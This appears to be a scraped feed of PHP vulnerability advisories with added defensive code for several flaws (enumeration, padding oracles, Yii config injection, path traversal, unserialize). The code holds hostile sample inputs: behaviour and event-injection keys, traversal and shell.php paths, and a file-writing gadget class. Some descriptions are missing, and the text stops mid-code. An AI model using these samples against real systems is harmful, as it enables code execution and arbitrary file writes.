Source : NVD
## 6.9
Score
Published January 14, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
algolia/algoliasearch-magento-2
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Jan 15, 2026
Wiz
CVE-2026-31821 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-31821 [MEDIUM] CVE-2026-31821 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31821 :
PHP vulnerability analysis and mitigation
Sylius is an Open Source eCommerce Framework on Symfony. The POST /api/v2/shop/orders/{tokenValue}/items endpoint does not verify cart ownership. An unauthenticated attacker can add items to other registered customers' carts by knowing the cart tokenValue. An attacker who obtains a cart tokenValue can add arbitrary items to another customer's cart. The endpoint returns the full cart representation in the response (HTTP 201). The issue is fixed in versions: 2.0.16, 2.1.12, 2.2.3 and above.
Source : NVD
## 6.9
Score
Published March 10, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz
CVE-2026-31888 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-31888 [MEDIUM] CVE-2026-31888 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31888 :
PHP vulnerability analysis and mitigation
Shopware is an open commerce platform. Prior to 6.7.8.1 and 6.6.10.15, the Store API login endpoint (POST /store-api/account/login) returns different error codes depending on whether the submitted email address belongs to a registered customer (CHECKOUT__CUSTOMER_AUTH_BAD_CREDENTIALS) or is unknown (CHECKOUT__CUSTOMER_NOT_FOUND). The "not found" response also echoes the probed email address. This allows an unauthenticated attacker to enumerate valid customer accounts. The storefront login controller correctly unifies both error paths, but the Store API does not — indicating an inconsistent defense. This vulnerability is fixed in 6.7.8.1 and 6.6.10.15.
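The two response shapes the Shopware advisory contrasts, as an added example that is not Shopware code: a leaky handler that returns distinct error codes (and reflects the probed address) next to a unified one in which "unknown user" and "wrong password" are indistinguishable by status, body and timing. The `$users` table is constructed in memory; a real handler would query a customer repository. The error-code names are the ones quoted in the advisory; everything else is illustrative. Requires PHP 8.

```php
<?php
declare(strict_types=1);

// Added example, not Shopware code. $users is a constructed in-memory table
// of e-mail => bcrypt hash.

function leaky_login(array $users, string $email, string $password): array
{
    if (!isset($users[$email])) {
        // Different code *and* the input is reflected: an enumeration oracle.
        return ['status' => 401, 'code' => 'CHECKOUT__CUSTOMER_NOT_FOUND',
                'message' => "No customer found for email \"$email\""];
    }
    if (!password_verify($password, $users[$email])) {
        return ['status' => 401, 'code' => 'CHECKOUT__CUSTOMER_AUTH_BAD_CREDENTIALS',
                'message' => 'Invalid credentials'];
    }
    return ['status' => 200, 'code' => 'OK', 'message' => ''];
}

function unified_login(array $users, string $email, string $password): array
{
    // A throwaway hash with the same cost as the real ones, so the unknown-user
    // path spends the same time in bcrypt as the known-user path does.
    static $dummyHash = null;
    $dummyHash ??= password_hash(bin2hex(random_bytes(16)), PASSWORD_BCRYPT, ['cost' => 10]);

    $known = isset($users[$email]);
    $ok = password_verify($password, $known ? $users[$email] : $dummyHash) && $known;

    if (!$ok) {
        // One code, one message, nothing reflected, regardless of *why* it failed.
        return ['status' => 401, 'code' => 'CHECKOUT__CUSTOMER_AUTH_BAD_CREDENTIALS',
                'message' => 'Invalid credentials'];
    }
    return ['status' => 200, 'code' => 'OK', 'message' => ''];
}

// --- constructed demo ---
$users = ['alice@example.com' => password_hash('correct horse', PASSWORD_BCRYPT, ['cost' => 10])];
$probe = fn(callable $login) => [
    'unknown' => $login($users, 'bob@example.com',   'x')['code'],
    'wrongpw' => $login($users, 'alice@example.com', 'x')['code'],
    'valid'   => $login($users, 'alice@example.com', 'correct horse')['code'],
];
print_r($probe('leaky_login'));    // unknown and wrongpw differ => enumerable
print_r($probe('unified_login'));  // unknown and wrongpw identical
```

The dummy-hash trick matters because, even with identical responses, skipping `password_verify()` for unknown accounts makes the unknown path measurably faster. Registration and password-reset endpoints need the same treatment, and a login rate limit keyed on both source and target account limits how far any residual oracle can be driven.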
Source : NVD
## 5.3
Score
Published March 11, 2026
Severity MEDIUM
Wiz
CVE-2026-33512 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-33512 [HIGH] CVE-2026-33512 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33512 :
PHP vulnerability analysis and mitigation
(Description not extracted; the surviving identifiers are `decryptString` and `view/url2Embed.json.php`.)
Source : NVD
## 7.5
Score
Published March 23, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 21, 2026
Wiz
CVE-2025-67856 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2025-67856 [MEDIUM] CVE-2025-67856 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67856 :
PHP vulnerability analysis and mitigation
A flaw was found in Moodle. An authorization logic flaw, specifically due to incomplete role checks during the badge awarding process, allowed badges to be granted without proper verification. This could enable unauthorized users to obtain badges they are not entitled to, potentially leading to privilege escalation or unauthorized access to certain features.
Source : NVD
## 9.8
Score
Published February 3, 2026
Severity CRITICAL
CNA Score 5.4
Affected Technologies
PHP
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
moodle
moodle/moodle
Sources
Wiz
CVE-2026-23496 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-23496 [MEDIUM] CVE-2026-23496 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23496 :
PHP vulnerability analysis and mitigation
Pimcore Web2Print Tools Bundle adds tools for web-to-print use cases to Pimcore. Prior to 5.2.2 and 6.1.1, the application fails to enforce proper server-side authorization checks on the API endpoint responsible for managing "Favourite Output Channel Configurations." Testing revealed that an authenticated backend user without explicitly lacking permissions for this feature was still able to successfully invoke the endpoint and modify or retrieve these configurations. This vulnerability is fixed in 5.2.2 and 6.1.1.
Source : NVD
## 5.4
Score
Published January 15, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz
CVE-2026-28697 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.4
CVE-2026-28697 [CRITICAL] CVE-2026-28697 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28697 :
PHP vulnerability analysis and mitigation
Craft is a content management system (CMS). Prior to 4.17.0-beta.1 and 5.9.0-beta.1, an authenticated administrator can achieve Remote Code Execution (RCE) by injecting a Server-Side Template Injection (SSTI) payload into Twig template fields (e.g., Email Templates). By calling the craft.app.fs.write() method, an attacker can write a malicious PHP script to a web-accessible directory and subsequently access it via the browser to execute arbitrary system commands. This vulnerability is fixed in 4.17.0-beta.1 and 5.9.0-beta.1.
Source : NVD
## 9.4
Score
Published March 4, 2026
Severity CRITICAL
CNA Score 9.4
Affected Technologies
PHP
Craft CMS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
Wiz
CVE-2026-23495 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
CVE-2026-23495 [MEDIUM] CVE-2026-23495 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23495 :
PHP vulnerability analysis and mitigation
Pimcore's Admin Classic Bundle provides a Backend UI for Pimcore. Prior to 2.2.3 and 1.7.16, the API endpoint for listing Predefined Properties in the Pimcore platform lacks adequate server-side authorization checks. Predefined Properties are configurable metadata definitions (e.g., name, key, type, default value) used across documents, assets, and objects to standardize custom attributes and improve editorial workflows, as documented in Pimcore's official properties guide. Testing confirmed that an authenticated backend user without explicit permissions for property management could successfully call the endpoint and retrieve the complete list of these configurations. The vulnerability is fixed in 2.2.3 and 1.7.16.
Source : NVD
Wiz
CVE-2026-29174 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-29174 [HIGH] CVE-2026-29174 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29174 :
PHP vulnerability analysis and mitigation
Craft Commerce is an ecommerce platform for Craft CMS. Prior to 5.5.3, Craft Commerce is vulnerable to SQL Injection in the inventory levels table data endpoint. The sort[0][direction] and sort[0][sortField] parameters are concatenated directly into an addOrderBy() clause without any validation or sanitization. An authenticated attacker with access to the Commerce Inventory section can inject arbitrary SQL queries, potentially leading to a full database compromise. This vulnerability is fixed in 5.5.3.
Source : NVD
## 8.7
Score
Published March 10, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz
CVE-2025-68454 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.2
CVE-2025-68454 [MEDIUM] CVE-2025-68454 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68454 :
PHP vulnerability analysis and mitigation
(Description not extracted; the only surviving identifier is `map`.)
Source : NVD
## 5.2
Score
Published January 5, 2026
Severity MEDIUM
CNA Score 5.2
Affected Technologies
PHP
Craft CMS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 66
Exploitation Probability (EPSS) 0.5
Affected packages and libraries
cpe:2.3:a:craftcms:craft_cms
craftcms/cms
Sources
Composer Severity MEDIUM Has Fix Added at: Jan 05, 2026
Linux Severity HIGH Has Fix Added at: Jan 06, 2026
Windows Severity HIGH Has Fix Added at: Jan 06, 2026
Linux Severity HIGH Has Fix Added at: Jan 13, 2026
Windows Severity HIGH Has Fix Added at: Jan 13, 2026
Wiz
CVE-2026-3452 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.9
CVE-2026-3452 [HIGH] CVE-2026-3452 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3452 :
PHP vulnerability analysis and mitigation
Concrete CMS below version 9.4.8 is vulnerable to Remote Code Execution by stored PHP object injection into the Express Entry List block via the columns parameter. An authenticated administrator can store attacker-controlled serialized data in block configuration fields that are later passed to unserialize() without class restrictions or integrity checks. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 8.9 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H. Thanks YJK ( @YJK0805 https://hackerone.com/yjk0805 ) of ZUSO ART https://zuso.ai/ for reporting.
Source : NVD
## 8.9
Score
Published March 4, 2026
Severity HIGH
CNA Score 8.9
Affected Technologies
PHP
Wiz
CVE-2025-68456 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.0
CVE-2025-68456 [HIGH] CVE-2025-68456 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68456 :
PHP vulnerability analysis and mitigation
Craft is a platform for creating digital experiences. In versions 5.0.0-RC1 through 5.8.20 and 3.0.0 through 4.16.16, unauthenticated users can trigger database backup operations via specific admin actions, potentially leading to resource exhaustion or information disclosure. Users should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue. Craft 3 users should update to the latest Craft 4 and 5 releases, which include the fixes.
Source : NVD
## 7
Score
Published January 5, 2026
Severity HIGH
CNA Score 7.0
Affected Technologies
PHP
Craft CMS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 38.5
Wiz
GHSA-vfpx-q664-h93m Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
[MEDIUM] GHSA-vfpx-q664-h93m Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-vfpx-q664-h93m :
PHP vulnerability analysis and mitigation
## Impact
In applications built with the Auth0 PHP SDK, cookies are encrypted with insufficient entropy, which may result in threat actors brute-forcing the encryption key and forging session cookies.
## Am I Affected?
Consumers are affected if their application meets the following preconditions:
It is using the Auth0 WordPress Plugin, versions between 5.0.0-BETA0 and 5.5.0
Auth0 WordPress plugin using the Auth0-PHP SDK versions between 8.0.0 to 8.18.0.
## Resolution
Upgrade Auth0/wordpress to version 5.6.0 or greater.
Source : NVD
## 8.2
Score
Published April 3, 2026
Severity HIGH
CNA Score N/A
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
Wiz
CVE-2026-32935 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.2
CVE-2026-32935 [HIGH] CVE-2026-32935 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32935 :
PHP vulnerability analysis and mitigation
phpseclib is a PHP secure communications library. Projects using versions 1.0.26 and below, 2.0.0 through 2.0.51, and 3.0.0 through 3.0.49 are vulnerable to a padding oracle timing attack when using AES in CBC mode. This issue has been fixed in versions 1.0.27, 2.0.52 and 3.0.50.
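Why the oracle exists and how encrypt-then-MAC closes it, as an added example that is not phpseclib code: a CBC padding oracle needs the receiver to reveal, through an error or a timing difference, whether the padding of a tampered ciphertext was valid. If the ciphertext is authenticated first, and the tag is compared in constant time, a tampered message is rejected before any padding is examined, so there is nothing for the attacker to measure. The class below uses PHP's `openssl_*` and `hash_*` functions only; the HKDF labels and the layout `iv || ciphertext || tag` are this example's own choices.

```php
<?php
declare(strict_types=1);

// Added example, not phpseclib code. Encrypt-then-MAC around AES-256-CBC with
// keys derived from one master key via HKDF so encryption and MAC never share
// a key.
final class EtmCbc
{
    private string $encKey;
    private string $macKey;

    public function __construct(string $masterKey)
    {
        if (strlen($masterKey) < 32) {
            throw new InvalidArgumentException('master key must be at least 32 bytes');
        }
        $this->encKey = hash_hkdf('sha256', $masterKey, 32, 'aes-256-cbc enc');
        $this->macKey = hash_hkdf('sha256', $masterKey, 32, 'hmac-sha256 mac');
    }

    public function encrypt(string $plaintext, string $aad = ''): string
    {
        $iv = random_bytes(16);
        $ct = openssl_encrypt($plaintext, 'aes-256-cbc', $this->encKey, OPENSSL_RAW_DATA, $iv);
        if ($ct === false) {
            throw new RuntimeException('encryption failed');
        }
        // The tag covers AAD, IV and ciphertext so none of them can be swapped.
        $tag = hash_hmac('sha256', $aad . $iv . $ct, $this->macKey, true);
        return $iv . $ct . $tag;
    }

    public function decrypt(string $blob, string $aad = ''): string
    {
        if (strlen($blob) < 16 + 16 + 32) {          // iv + one block + tag
            throw new RuntimeException('ciphertext too short');
        }
        $iv  = substr($blob, 0, 16);
        $tag = substr($blob, -32);
        $ct  = substr($blob, 16, -32);
        $expected = hash_hmac('sha256', $aad . $iv . $ct, $this->macKey, true);
        // Constant-time comparison: a plain === stops at the first differing
        // byte and would itself be a timing oracle.
        if (!hash_equals($expected, $tag)) {
            throw new RuntimeException('authentication failed');
        }
        // Only authentic ciphertext reaches the padding check, so there is no
        // observable "bad padding" state for attacker-chosen data.
        $pt = openssl_decrypt($ct, 'aes-256-cbc', $this->encKey, OPENSSL_RAW_DATA, $iv);
        if ($pt === false) {
            throw new RuntimeException('decryption failed');
        }
        return $pt;
    }
}

// --- constructed demo ---
$box  = new EtmCbc(random_bytes(32));
$blob = $box->encrypt('hello', 'user=42');
var_dump($box->decrypt($blob, 'user=42') === 'hello');   // true
$tampered = $blob;
$tampered[16 + 4] = chr(ord($tampered[16 + 4]) ^ 0x01);  // flip one ciphertext bit
try {
    $box->decrypt($tampered, 'user=42');
} catch (RuntimeException $e) {
    echo $e->getMessage(), "\n";                         // "authentication failed", never "bad padding"
}
```

Where the platform offers it, an AEAD mode (`aes-256-gcm` via `openssl_encrypt()` with its `$tag` argument) gives the same property with fewer parts to get wrong; the explicit construction above is useful when CBC is mandated by a protocol or a peer.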
Source : NVD
## 8.2
Score
Published March 20, 2026
Severity HIGH
CNA Score 8.2
Affected Technologies
PHP
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
nextcloud-nginx
phpseclib
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM Has Fix Added at: Mar 21,
Wiz
CVE-2026-33766 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-33766 [MEDIUM] CVE-2026-33766 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33766 :
PHP vulnerability analysis and mitigation
(Description not extracted; the surviving identifiers are `isSSRFSafeURL()` and `url_get_contents()`.)
Source : NVD
## 5.3
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 29, 2026
Wiz
CVE-2026-35448 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.7
CVE-2026-35448 [LOW] CVE-2026-35448 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35448 :
PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions 26.0 and prior, the BlockonomicsYPT plugin's check.php endpoint returns payment order data for any Bitcoin address without requiring authentication. The endpoint was designed as an AJAX polling helper for the authenticated invoice.php page, but it performs no access control checks of its own. Since Bitcoin addresses are publicly visible on the blockchain, an attacker can query payment records for any address used on the platform.
Source : NVD
## 3.7
Score
Published April 6, 2026
Severity LOW
CNA Score 3.7
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz
CVE-2026-3240 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-3240 [MEDIUM] CVE-2026-3240 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3240 :
PHP vulnerability analysis and mitigation
In Concrete CMS below version 9.4.8, a user with permission to edit a page with element Legacy form can perform a stored XSS attack towards high-privilege accounts via the Question field. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 4.8 with vector CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N Thanks minhnn42, namdi and quanlna2 from VCSLab-Viettel Cyber Security for reporting.
Source : NVD
## 4.8
Score
Published March 4, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.5
Exploitation Probability (EPSS) N/A
Wiz
CVE-2026-21446 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-21446 [HIGH] CVE-2026-21446 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21446 :
PHP vulnerability analysis and mitigation
(Description not extracted; the only surviving identifier is `/install/api/*`.)
Source : NVD
## 8.8
Score
Published January 2, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 33.6
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
bagisto/bagisto
Sources
NVD
Composer Severity HIGH Has Fix Added at: Jan 03, 2026
Wiz
CVE-2026-26989 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
CVE-2026-26989 [MEDIUM] CVE-2026-26989 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26989 :
PHP vulnerability analysis and mitigation
LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. Versions 25.12.0 and below are affected by a Stored Cross-Site Scripting (XSS) vulnerability in the Alert Rules workflow. An attacker with administrative privileges can inject malicious scripts that execute in the browser context of any user who accesses the Alert Rules page. This issue has been fixed in version 26.2.0.
Source : NVD
## 4.8
Score
Published February 20, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.1
Exploitation Probability (EPSS) N/A
Wiz
CVE-2026-33157 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-33157 [HIGH] CVE-2026-33157 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33157 :
PHP vulnerability analysis and mitigation
Craft CMS is a content management system (CMS). From version 5.6.0 to before version 5.9.13, a Remote Code Execution (RCE) vulnerability exists in Craft CMS, it can be exploited by any authenticated user with control panel access. This is a bypass of a previous fix. The existing patches add cleanseConfig() to assembleLayoutFromPost() and various FieldsController actions to strip Yii2 behavior/event injection keys ("as" and "on" prefixed keys). However, the fieldLayouts parameter in ElementIndexesController::actionFilterHud() is passed directly to FieldLayout::createFromConfig() without any sanitization, enabling the same behavior injection attack chain. This issue has been patched in version 5.9.13.
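What a config sanitiser of the kind the Craft advisory describes has to do, as an added example that is not Craft's `cleanseConfig()`: Yii's `Yii::configure()` path treats array keys beginning with `on ` as event handlers and `as ` as behaviour attachments, and either can name an arbitrary callable or class, which is how a request-controlled config array becomes code execution. The advisory's point is that the stripping was applied in some controllers but not in `actionFilterHud()`; the function below therefore (a) recurses, since nested configs are instantiated too, and (b) is meant to sit at the single place every config passes through rather than in individual actions. The optional allowlist on `class`/`type` keys and the hypothetical class names in the demo are this example's own.

```php
<?php
declare(strict_types=1);

// Added example, not Craft's cleanseConfig(). Removes Yii behaviour ("as ...")
// and event ("on ...") keys at any depth and, when an allowlist is given,
// refuses class/type values outside it.
function cleanse_config(array $config, array $allowedClasses = []): array
{
    $clean = [];
    foreach ($config as $key => $value) {
        if (is_string($key)) {
            $k = ltrim($key);
            // Yii matches exactly "as " / "on "; being stricter than Yii is harmless.
            if (preg_match('/^(as|on)\s/i', $k)) {
                continue;
            }
            if (in_array(strtolower($k), ['class', '__class', 'type'], true)
                && $allowedClasses !== []
                && !in_array($value, $allowedClasses, true)) {
                throw new InvalidArgumentException(
                    'class not permitted in config: ' . var_export($value, true)
                );
            }
        }
        $clean[$key] = is_array($value) ? cleanse_config($value, $allowedClasses) : $value;
    }
    return $clean;
}

// --- constructed demo: a field-layout-shaped config as a request body might carry it ---
$untrusted = [
    'tabs' => [[
        'name'     => 'Content',
        'elements' => [[
            'type'      => 'app\layout\TitleField',       // hypothetical element class
            'as inject' => ['class' => 'app\Dangerous'],  // behaviour => arbitrary class instantiation
            'on init'   => 'phpinfo',                     // event handler => arbitrary callable
            'required'  => true,
        ]],
    ]],
];
print_r(cleanse_config($untrusted));   // "as inject" and "on init" are gone at every depth

try {
    cleanse_config(['type' => 'app\Evil'], ['app\layout\TitleField']);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}
```

Stripping keys is the minimum; the stronger fix is to never feed a request body to a generic object factory at all and instead map the few fields the endpoint actually needs onto a typed structure, so there is no `createFromConfig()` call left to bypass.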
Source : NVD
## 8.6
Wiz
CVE-2026-30940 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2026-30940 [HIGH] CVE-2026-30940 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30940 :
PHP vulnerability analysis and mitigation
baserCMS is a website development framework. Prior to version 5.2.3, a path traversal vulnerability exists in the theme file management API (/baser/api/admin/bc-theme-file/theme_files/add.json) that allows arbitrary file write. An authenticated administrator can include ../ sequences in the path parameter to create a PHP file in an arbitrary directory outside the theme directory, which may result in remote code execution (RCE). This issue has been patched in version 5.2.3.
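A containment check for an add-file API like the one the baserCMS advisory describes, as an added example that is not baserCMS code: the property to establish is that the final, canonical location lies inside the theme directory. Searching the string for `../` is not enough (encoded dots, symlinks, a prefix compare against `/themes/foo` that also matches `/themes/foobar`), so the parent directory is resolved with `realpath()` and compared with a trailing separator. Executable extensions are refused independently, because a writable `.php` anywhere under the web root is code execution regardless of traversal. Class and method names, the extension list and the temp-dir demo are this example's assumptions; requires PHP 8.

```php
<?php
declare(strict_types=1);

// Added example, not baserCMS code.
final class ThemeFileWriter
{
    private const ALLOWED_EXT = ['css', 'js', 'html', 'twig', 'txt', 'svg', 'png', 'jpg'];
    private string $root;

    public function __construct(string $themeDir)
    {
        $real = realpath($themeDir);
        if ($real === false || !is_dir($real)) {
            throw new InvalidArgumentException('theme dir does not exist');
        }
        $this->root = $real;
    }

    /** Resolve $relative under the root or throw; returns the absolute target path. */
    public function resolve(string $relative): string
    {
        if (str_contains($relative, "\0")) {
            throw new InvalidArgumentException('NUL byte in path');
        }
        $ext = strtolower(pathinfo($relative, PATHINFO_EXTENSION));
        if (!in_array($ext, self::ALLOWED_EXT, true)) {
            throw new InvalidArgumentException("extension not allowed: .$ext");
        }
        // The file may not exist yet, so canonicalise its *parent* (which must).
        $parent = realpath($this->root . DIRECTORY_SEPARATOR . dirname($relative));
        if ($parent === false) {
            throw new InvalidArgumentException('parent directory does not exist');
        }
        // Compare with a trailing separator so /themes/foo does not accept /themes/foobar/x.
        $rootPrefix = rtrim($this->root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
        if ($parent !== $this->root && !str_starts_with($parent . DIRECTORY_SEPARATOR, $rootPrefix)) {
            throw new InvalidArgumentException('path escapes theme directory');
        }
        $name = basename($relative);
        if ($name === '' || $name === '.' || $name === '..') {
            throw new InvalidArgumentException('invalid file name');
        }
        return $parent . DIRECTORY_SEPARATOR . $name;
    }

    public function write(string $relative, string $contents): string
    {
        $target = $this->resolve($relative);
        file_put_contents($target, $contents, LOCK_EX);
        return $target;
    }
}

// --- constructed demo in a throwaway directory ---
$sandbox = sys_get_temp_dir() . '/theme-' . bin2hex(random_bytes(4));
mkdir("$sandbox/css", 0700, true);
$w = new ThemeFileWriter($sandbox);
echo "accepted: ", $w->write('css/site.css', 'body{}'), "\n";
foreach (['../evil.css', 'css/../../evil.css', 'shell.php', 'css/x.PHP'] as $p) {
    try {
        $w->resolve($p);
        echo "accepted $p ?!\n";
    } catch (InvalidArgumentException $e) {
        echo "rejected $p: {$e->getMessage()}\n";
    }
}
```

Two residual risks the check does not cover on its own: a symlink already inside the theme directory that points outside it (resolved by `realpath()`, so it is caught here, but only if the link exists before the write), and a web server that executes a non-`.php` extension because of a multi-extension handler such as `x.php.css`; the extension allowlist plus a `php_admin_flag engine off` (or equivalent) on the themes directory closes the second.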
Source : NVD
## 7.2
Score
Published March 31, 2026
Severity HIGH
CNA Score 7.2
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz
CVE-2026-28783 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.4
CVE-2026-28783 [CRITICAL] CVE-2026-28783 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28783 :
PHP vulnerability analysis and mitigation
Craft is a content management system (CMS). Prior to 5.9.0-beta.1 and 4.17.0-beta.1, Craft CMS implements a blocklist to prevent potentially dangerous PHP functions from being called via Twig non-Closure arrow functions. In order to be able to successfully execute this attack, you need to either have allowAdminChanges enabled on production, or a compromised admin account, or an account with access to the System Messages utility. Several PHP functions are not included in the blocklist, which could allow malicious actors with the required permissions to execute various types of payloads, including RCEs, arbitrary file reads, SSRFs, and SSTIs. This vulnerability is fixed in 5.9.0-beta.1 and 4.17.0-beta.1.
Source : NVD
## 9.4
Wiz
CVE-2026-29782 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2026-29782 [HIGH] CVE-2026-29782 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29782 :
PHP vulnerability analysis and mitigation
OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to version 2.10.2, the oauth2.php file in OpenSTAManager is an unauthenticated endpoint ($skip_permissions = true). It loads a record from the zz_oauth2 table using the attacker-controlled GET parameter state, and during the OAuth2 configuration flow calls unserialize() on the access_token field without any class restriction. This issue has been patched in version 2.10.2.
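The sink that both the Concrete CMS and the OpenSTAManager advisories above share is `unserialize()` on data an attacker can influence, with no class restriction. As an added example that is not code from either project, the block shows why that is a gadget-chain sink, the `allowed_classes` restriction, and the preferable route for stored tokens: do not use PHP serialization at all, and authenticate the stored blob with an HMAC before decoding it, so a row tampered with through a second-order path still fails. The `LogFlusher` class is a stand-in gadget constructed for the demo; the serialized payload is built as a string so that no destructor actually runs.

```php
<?php
declare(strict_types=1);

// Added example, not Concrete CMS or OpenSTAManager code.

// Stand-in for any autoloadable "gadget": a class whose magic method has a
// side effect. Real chains reach file writes or command execution similarly.
final class LogFlusher
{
    public function __construct(public string $path, public string $data) {}
    public function __destruct()
    {
        file_put_contents($this->path, $this->data); // attacker-controlled path and content
    }
}

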